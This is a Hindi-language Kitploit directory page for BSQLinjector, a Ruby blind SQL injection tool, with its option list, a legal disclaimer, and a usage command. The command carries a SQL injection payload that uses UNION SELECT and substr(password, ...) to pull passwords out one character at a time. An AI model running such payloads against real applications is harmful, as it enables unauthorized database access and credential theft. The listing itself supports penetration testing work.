Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
BSQLinjector — रूबी में लिखा गया ब्लाइंड SQL इंजेक्शन शोषण उपकरण। | Kitploit
उपकरण/GitHubGitHub/enjoiz/bsqlinjector
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubenjoiz/bsqlinjector

BSQLinjector

रूबी में लिखा गया ब्लाइंड SQL इंजेक्शन शोषण उपकरण।

रिपॉजिटरी देखें
100271 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

BSQLinjector

BSQLinjector डेटाबेस से डेटा प्राप्त करने के लिए ब्लाइंड विधि का उपयोग करता है। मैं एप्लिकेशन पर भेजने से पहले यह स्पष्ट रूप से देखने के लिए "--test" स्विच का उपयोग करने की सलाह देता हूँ कि कॉन्फ़िगर किया गया पेलोड कैसा दिखता है।

विकल्प:

root@kitploit:~
  --file	    Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt)
  --pattern	    Mandatory - Pattern to look for when query is true. (--pattern=truestatement)
  --prepend	    Mandatory - Main payload. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,"
  --append	    How to end our payload. For example comment out rest of SQL statement. (--append='#)
  --schar	    Character placed around chars. This character is not used while in hex mode. (--schar="'")
  --2ndfile	    File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)

  --mode	    Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using "<", ">", "=" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l)
  --postgres        Use postgres "for" in substring function (e.g. from 1 for 1).
  --hex		    Use hex to compare instead of characters.
  --case	    Case sensitivity.

  --ssl		    Use SSL.
  --proxy	    Proxy to use. (--proxy=127.0.0.1:8080)

  --test	    Enable test mode. Do not send request, just show full payload.
  --special	    Include all special characters in enumeration.
  --start	    Start enumeration from specified character. (--start=10)
  --max		    Maximum characters to enumerate. (--max=10)
  --timeout	    Timeout in waiting for responses. (--timeout=20)
  --only-final	    Stop showing each enumerated letter.
  --comma	    Encode comma.
  --bracket	    Add brackets to the end of substring function. --bracket="))"
  --hexspace	    Use space instead of brackets to split hex values.
  --verbose	    Show verbose messages.

उपयोग का उदाहरण:

root@kitploit:~
  ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl

अस्वीकरण

यह रिपॉजिटरी पूरी तरह से शैक्षिक उद्देश्यों के लिए विकसित उपकरण शामिल करती है। अवैध गतिविधियों के लिए उपकरण का कोई भी दुरुपयोग सख्त वर्जित है।

कानूनी नोटिस

साइबर सुरक्षा और नैतिक हैकिंग से संबंधित सभी स्थानीय कानूनों और नियमों को समझना और उनका पालन करना महत्वपूर्ण है। कंप्यूटर सिस्टम, नेटवर्क या डेटा तक अनधिकृत पहुंच अवैध है और कानून द्वारा दंडनीय है। इस रिपॉजिटरी के डेवलपर यहां शामिल उपकरणों के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।

इस रिपॉजिटरी में उपकरणों का उपयोग करके, आप उनका जिम्मेदारीपूर्वक और नैतिक रूप से उपयोग करने के लिए सहमत हैं। किसी भी नेटवर्क, सिस्टम या डेटा, जो आपका नहीं है, का परीक्षण या उस तक पहुंचने का प्रयास करने से पहले हमेशा स्पष्ट अनुमति प्राप्त करें।

टूल डाउनलोड करें